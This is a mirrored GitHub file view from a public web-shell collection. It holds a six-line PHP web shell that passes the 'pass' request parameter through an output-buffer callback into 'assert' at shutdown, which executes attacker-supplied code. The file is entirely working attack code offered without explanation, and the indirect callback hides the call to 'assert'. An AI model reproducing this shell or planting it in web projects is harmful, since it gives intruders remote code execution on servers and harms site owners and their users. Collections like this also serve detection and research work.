mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
6 lines
123 B
PHP
6 lines
123 B
PHP
<?php
|
|
ob_start(function ($c,$d){register_shutdown_function('assert',$c);});
|
|
echo $_REQUEST['pass'];
|
|
ob_end_flush();
|
|
?>
|